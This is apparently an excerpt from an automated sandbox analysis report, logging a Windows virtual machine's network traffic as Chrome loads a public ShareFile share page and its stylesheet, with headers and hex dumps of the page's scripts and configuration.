                                                                                                                                                                                                                                                                                2024-10-09 18:04:58 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                2024-10-09 18:04:58 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 4e 76 79 53 46 6a 58 39 67 6b 4b 68 65 4f 55 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 31 64 64 61 62 37 66 65 32 35 65 65 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: NvySFjX9gkKheOU7.2Context: 2781ddab7fe25ee2<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                                                                                                                                                                                                                                                2024-10-09 18:04:58 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 76 79 53 46 6a 58 39 67 6b 4b 68 65 4f 55 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 31 64 64 61 62 37 66 65 32 35 65 65 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: NvySFjX9gkKheOU7.3Context: 2781ddab7fe25ee2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                2024-10-09 18:04:59 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                2024-10-09 18:04:59 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 71 33 4c 54 4f 33 74 4d 6b 75 6d 76 5a 38 54 55 67 6f 72 49 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: Uq3LTO3tMkumvZ8TUgorIw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                1192.168.2.64971513.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC699OUTGET /public/share/web-189361297164461c HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC2196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                Content-Security-Policy: style-src 'self' 'unsafe-inline' https://citrix-sharefile-content.customer.pendo.io https://citrix-sharefile-data.customer.pendo.io https://pendo-static-5352587489443840.storage.googleapis.com https://fonts.googleapis.com https://piletfeed-cdn.sharefile.io; script-src 'self' 'unsafe-inline' 'strict-dynamic' 'nonce-jqZKBseQjzFpbTcaeTGbFw==' https://request.eprotect.vantivcnp.com https://consent.trustarc.com https://www.gstatic.com/recaptcha/ https://citrix-sharefile-content.customer.pendo.io https://citrix-sharefile-data.customer.pendo.io https://pendo-static-5352587489443840.storage.googleapis.com https://maps.googleapis.com https://payments.worldpay.com https://0093b71e39a6.us-east-1.sdk.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js; frame-ancestors 'none'; report-uri /api/cspviolation
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC7696INData Raw: 31 65 30 38 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 53 68 61 72 65 46 69 6c 65 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 6a 71 5a 4b 42 73 65 51 6a 7a 46 70 62 54 63 61 65 54 47 62 46 77 3d 3d 22 3e 0a 09 09 09 3b 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 3b 4e 52 45 55 4d 2e 69 6e 69 74 3d 7b 64 69 73 74 72 69 62 75 74 65 64 5f 74 72 61 63 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 74 72 75 65 7d 2c 70 72 69 76 61 63 79 3a 7b 63 6f
                                                                                                                                                                                                                                                                                Data Ascii: 1e08<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>ShareFile</title><script type="text/javascript" nonce="jqZKBseQjzFpbTcaeTGbFw==">;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{co
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC16384INData Raw: 37 66 66 30 0d 0a 3b 69 66 28 61 29 7b 76 61 72 20 64 3d 73 28 61 29 2c 70 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 2e 70 61 72 65 6e 74 5b 64 2e 6b 65 79 5d 3b 69 66 28 70 29 7b 76 61 72 20 6c 3d 7b 7d 3b 75 2e 69 6e 50 6c 61 63 65 28 64 2e 70 61 72 65 6e 74 2c 5b 64 2e 6b 65 79 5d 2c 22 63 62 2d 22 2c 6c 29 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 65 2c 63 28 21 31 29 29 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 6e 2c 63 28 21 31 29 29 2c 66 2e 65 6d 69 74 28 22 6e 65 77 2d 6a 73 6f 6e 70 22 2c 5b 74 2e 73 72 63 5d 2c 6c 29 7d 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 72 65 74 75 72 6e 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 69
                                                                                                                                                                                                                                                                                Data Ascii: 7ff0;if(a){var d=s(a),p="function"==typeof d.parent[d.key];if(p){var l={};u.inPlace(d.parent,[d.key],"cb-",l),t.addEventListener("load",e,c(!1)),t.addEventListener("error",n,c(!1)),f.emit("new-jsonp",[t.src],l)}}}}}function o(){return"addEventListener"i
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC16376INData Raw: 65 22 2c 5b 66 5d 29 29 7d 69 66 28 21 28 22 69 6e 69 74 22 69 6e 20 4e 52 45 55 4d 26 26 22 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 22 69 6e 20 4e 52 45 55 4d 2e 69 6e 69 74 26 26 22 65 6e 61 62 6c 65 64 22 69 6e 20 4e 52 45 55 4d 2e 69 6e 69 74 2e 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 26 26 4e 52 45 55 4d 2e 69 6e 69 74 2e 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 2e 65 6e 61 62 6c 65 64 3d 3d 3d 21 31 29 29 7b 76 61 72 20 66 2c 75 2c 64 2c 70 2c 6c 3d 74 28 22 68 61 6e 64 6c 65 22 29 2c 68 3d 74 28 22 6c 6f 61 64 65 72 22 29 2c 6d 3d 74 28 33 30 29 2c 76 3d 74 28 32 33 29 2c 77 3d 4e 52 45 55 4d 2e 6f 2e 45 56 3b 69 66 28 22 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 66 75 6e
                                                                                                                                                                                                                                                                                Data Ascii: e",[f]))}if(!("init"in NREUM&&"page_view_timing"in NREUM.init&&"enabled"in NREUM.init.page_view_timing&&NREUM.init.page_view_timing.enabled===!1)){var f,u,d,p,l=t("handle"),h=t("loader"),m=t(30),v=t(23),w=NREUM.o.EV;if("PerformanceObserver"in window&&"fun
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC16384INData Raw: 35 32 30 33 0d 0a 2d 6d 62 22 3a 31 30 30 2c 22 65 6e 61 62 6c 65 2d 73 75 62 6d 69 74 2d 65 6d 61 69 6c 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 72 65 6d 69 6e 64 65 72 2d 6a 6f 62 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 2d 70 69 6c 65 74 2d 75 73 65 72 2d 61 63 74 69 76 69 74 79 2d 68 69 73 74 6f 72 79 22 3a 74 72 75 65 2c 22 53 68 61 72 65 5f 52 65 63 6f 6d 6d 65 6e 64 65 72 5f 53 6b 69 70 5f 42 75 74 74 6f 6e 5f 47 72 61 63 65 5f 50 65 72 69 6f 64 5f 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 3a 32 30 30 30 2c 22 6f 70 65 6e 2d 69 6e 2d 64 65 73 6b 74 6f 70 2d 62 75 74 74 6f 6e 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 2d 64 79 6e 61 6d 69 63 2d 66 6f 72 6d 73 22 3a 74 72 75 65 2c 22 63 6c 69 65 6e 74 70 61 79 6d 65 6e 74 73 22 3a 74 72 75 65 2c 22 65
                                                                                                                                                                                                                                                                                Data Ascii: 5203-mb":100,"enable-submit-email-verification-reminder-job":true,"enable-pilet-user-activity-history":true,"Share_Recommender_Skip_Button_Grace_Period_Milliseconds":2000,"open-in-desktop-button":true,"enable-dynamic-forms":true,"clientpayments":true,"e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC4619INData Raw: 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 37 7d 2c 22 75 73 65 2d 70 72 6f 76 69 73 69 6f 6e 69 6e 67 2d 64 69 73 70 61 74 63 68 65 72 2d 61 6e 64 2d 77 6f 72 6b 66 6c 6f 77 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 34 7d 2c 22 77 65 62 61 70 70 5f 75 73 65 5f 70 69 6c 65 74 5f 73 65 63 6f 6e 64 61 72 79 5f 6e 61 76 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 37 7d 2c 22 65 73 69 67 6e 2d 70 69 6c 65 74 2d 65 6e 61 62 6c 65 2d 69 6d 70 6f 72 74 2d 6f 76 65 72 6c 61 79 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 32 7d 2c 22 63 6c 69 65 6e 74 2d 6d 79 2d 66 69 6c 65 73 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: ":{"variation":0,"version":7},"use-provisioning-dispatcher-and-workflow":{"variation":0,"version":4},"webapp_use_pilet_secondary_nav":{"variation":0,"version":7},"esign-pilet-enable-import-overlay":{"variation":0,"version":2},"client-my-files":{"variation
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC16384INData Raw: 35 30 30 35 0d 0a 61 64 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 36 2c 22 76 65 72 73 69 6f 6e 22 3a 33 39 7d 2c 22 65 6e 61 62 6c 65 2d 74 65 6d 70 6c 61 74 65 73 2d 73 64 6b 2d 76 32 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 33 7d 2c 22 65 6e 61 62 6c 65 2d 6e 65 77 2d 73 65 61 72 63 68 2d 62 61 72 2d 69 6e 2d 77 65 62 61 70 70 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 31 30 7d 2c 22 65 73 69 67 6e 2d 70 69 6c 65 74 2d 65 6e 61 62 6c 65 2d 62 75 6c 6b 2d 73 65 6e 64 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 34 7d 2c 22 65 6e 61 62 6c 65 2d 72 70 2d 64 65 63 6f 75 70 6c 69 6e 67 2d 61 70 69 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a
                                                                                                                                                                                                                                                                                Data Ascii: 5005ad":{"variation":6,"version":39},"enable-templates-sdk-v2":{"variation":0,"version":3},"enable-new-search-bar-in-webapp":{"variation":0,"version":10},"esign-pilet-enable-bulk-send":{"variation":0,"version":4},"enable-rp-decoupling-api":{"variation":
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC16384INData Raw: 64 65 76 2d 74 68 72 65 61 74 61 6c 65 72 74 2d 6d 67 74 2d 70 69 6c 65 74 2f 31 2e 31 34 2e 30 2f 70 61 63 6b 61 67 65 2f 64 69 73 74 2f 74 68 69 72 64 70 61 72 74 79 2e 74 78 74 22 2c 22 73 6f 75 72 63 65 43 6f 6d 6d 69 74 22 3a 22 39 64 61 33 38 36 34 33 37 35 64 39 31 63 66 66 32 30 64 62 31 33 30 38 65 64 61 39 30 37 64 61 32 61 31 35 33 32 62 32 22 7d 2c 22 72 65 71 75 69 72 65 52 65 66 22 3a 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 68 72 65 61 74 61 6c 65 72 74 6d 67 74 70 69 6c 65 74 22 2c 22 69 6e 74 65 67 72 69 74 79 22 3a 22 73 68 61 33 38 34 2d 58 6e 53 65 57 73 59 6b 30 37 79 43 6e 34 33 55 50 47 76 45 68 79 68 46 69 58 6f 77 75 4e 4b 74 65 48 64 77 4d 75 53 67 74 4d 7a 73 36 63 64 74 59 56 51 72
                                                                                                                                                                                                                                                                                Data Ascii: dev-threatalert-mgt-pilet/1.14.0/package/dist/thirdparty.txt","sourceCommit":"9da3864375d91cff20db1308eda907da2a1532b2"},"requireRef":"webpackChunkpr_sharefiledevthreatalertmgtpilet","integrity":"sha384-XnSeWsYk07yCn43UPGvEhyhFiXowuNKteHdwMuSgtMzs6cdtYVQr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC2715INData Raw: 61 39 34 0d 0a 66 69 6c 65 2e 69 6f 2f 73 68 61 72 65 66 69 6c 65 2d 77 65 62 2f 73 68 61 72 65 66 69 6c 65 64 65 76 2d 63 6c 69 65 6e 74 2d 6d 67 74 2d 70 69 6c 65 74 2f 30 2e 36 31 2e 30 2f 70 61 63 6b 61 67 65 2f 64 69 73 74 2f 69 6e 64 65 78 2e 6a 73 22 2c 22 63 75 73 74 6f 6d 22 3a 7b 22 72 65 71 75 69 72 65 64 46 65 61 74 75 72 65 46 6c 61 67 73 22 3a 7b 22 65 6e 61 62 6c 65 5f 63 6c 69 65 6e 74 5f 6d 67 74 22 3a 74 72 75 65 7d 2c 22 74 68 69 72 64 50 61 72 74 79 4c 69 63 65 6e 73 65 73 50 61 74 68 22 3a 22 64 69 73 74 2f 74 68 69 72 64 70 61 72 74 79 2e 74 78 74 22 2c 22 74 68 69 72 64 50 61 72 74 79 4c 69 63 65 6e 73 65 73 4c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 2f 2f 70 69 6c 65 74 66 65 65 64 2d 63 64 6e 2e 73 68 61 72 65 66 69 6c 65 2e 69 6f 2f
                                                                                                                                                                                                                                                                                Data Ascii: a94file.io/sharefile-web/sharefiledev-client-mgt-pilet/0.61.0/package/dist/index.js","custom":{"requiredFeatureFlags":{"enable_client_mgt":true},"thirdPartyLicensesPath":"dist/thirdparty.txt","thirdPartyLicensesLink":"https://piletfeed-cdn.sharefile.io/
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                2192.168.2.64971613.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC1241OUTGET /css/spinner.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALBTGCORS=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALB=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; AWSALBCORS=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy
                                                                                                                                                                                                                                                                                2024-10-09 18:05:05 UTC1415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:05 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 1247
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x; Expires=Wed, 16 Oct 2024 18:05:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a8c23df"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
